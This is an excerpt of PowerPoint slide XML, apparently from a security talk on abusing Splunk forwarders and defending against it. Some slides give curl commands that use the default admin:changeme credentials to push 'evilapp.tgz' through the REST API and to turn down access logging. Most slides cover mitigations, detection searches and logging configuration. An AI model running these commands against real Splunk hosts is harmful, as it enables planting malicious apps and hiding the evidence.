              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{984D900B-E22A-804B-85EB-32DCE58796EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>It just keeps getting better:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Deploy your app without an evil deployment server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>POST the file and deploy with one command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>curl -k -u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>admin:changeme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://localhost:8090/services/apps/local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>" -d filename=1 -d name=/path/to/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>evilapp.tgz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2910999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37EF1-71EA-9249-AA56-0B2327DC1856}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What About Logging?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3406D9B1-C895-9A41-BD10-FC9F87F58A19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Internal logging by the forwarder is complex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AuditLogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> - Audit:[timestamp=06-03-2017 09:19:00.136, user=admin, action=login attempt, info=succeeded, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=127.0.0.1][n/a]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>REST can change logging levels too</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>curl -k -u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>admin:changeme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://localhost:8090/servicesNS/nobody/system/admin/logger/HTTPAccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -d 'level=ERROR’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3842850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92AA2-2EC3-2347-B29A-BBEB0B791E73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mitigations: Default Creds</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{868ED098-8A26-B14D-BF32-5856A365FB17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Change them!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Make them hard to guess</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>99% of the time you don’t even need to know them</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>If you need Forwarder credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Remove $SPLUNK_HOME/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>, and restart </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>Splunk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2696171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42A2F-AE1B-D043-BF12-E73D97E343AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mitigations: REST API</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECBFEC9F-C795-9041-BE9A-F08259D0D68A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Forwarders don’t need the REST API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Indexers and Search Heads usually do (YMMV)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Best practice: disable the REST API entirely on Forwarders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>github.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>georgestarcher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>/UF-TA-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>killrest</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Known issue for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>Splunk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>REST API is restricted to 127.0.0.1 if the credentials are default</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1643926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1DC5D-9E79-D447-88BD-581B7B65933C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mitigations: Detection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F088FA-2C5A-394D-A576-655354D6F0C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Log and alert on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> metadata events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Watch for forwarders failing to check in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Changes via REST are logged and forwarded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Lots of artifacts left by this technique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Hard to find and squash before it gets shipped to the indexers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3500" dirty="0">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>index=_internal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3500" dirty="0" err="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>sourcetype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3500" dirty="0">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3500" dirty="0" err="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>splunkd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3500" dirty="0">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3500" dirty="0" err="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>DeployedApplication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3500" dirty="0">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t> Downloaded </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3500" dirty="0" err="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3500" dirty="0">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>!=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000" i="1" dirty="0">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>&lt;deployment server here&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3644853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AAF33-1C41-AF47-80CD-AE82E156620A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mitigation: Extended Logging</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8FBB3E5-D37E-5746-9893-AF7BAE38F89B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Props.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>[source::.../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>/log/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>audit.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>(.\d+)?]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>TRANSFORMS = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>send_to_underscore_audit</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Transforms.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>send_to_underscore_audit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>MV_ADD = true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>DEST_KEY = _</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>MetaData:Index</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>REGEX = .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>FORMAT = _audit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1027309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E1AF9-A604-0D4D-98D4-657F0CD52FC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extended Logging Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19EFB91C-48FC-2E46-A88C-E59E99C26946}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>03-14-2018 09:02:05.747 -0500 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>INFO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>AuditLogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> - Audit:[timestamp=03-14-2018 09:02:05.747, user=admin, action=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>edit_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>info=granted object="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTPAccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" operation=edit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>][n/a]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="986782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5A989-0B6E-3141-A3E4-53E53DA91943}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mitigations: TLS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EF57BB4-9AF8-4A4D-9CC0-63B252F122A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Force all Deployment Server communications to use properly validated TLS certificates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
